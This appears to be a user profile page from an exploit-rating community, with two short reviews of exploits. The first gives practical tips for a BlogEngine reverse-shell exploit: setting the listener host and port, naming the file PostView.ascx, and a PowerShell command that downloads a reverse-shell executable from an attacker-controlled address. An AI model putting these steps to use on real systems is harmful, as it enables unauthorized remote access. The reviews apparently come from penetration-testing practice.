Leafry (7)

Last Login: February 11, 2021
Assessments
2
Score
7

Leafry's Contributions (2)

Sort by:
Filter by:
3
Ratings
Technical Analysis

This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.

Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(”\(LHOST", \)LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others, this exploit creates a very unstable shell.
-The script should be named PostView.ascx

Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. –> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe

2
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
Technical Analysis

This exploit is ok. When running on my attack box I had to modify the code. Not the worse case. Just a few commands threw syntax errors. In the end the CVE was able to provide a salt and hash that gave me credentials to get into the box.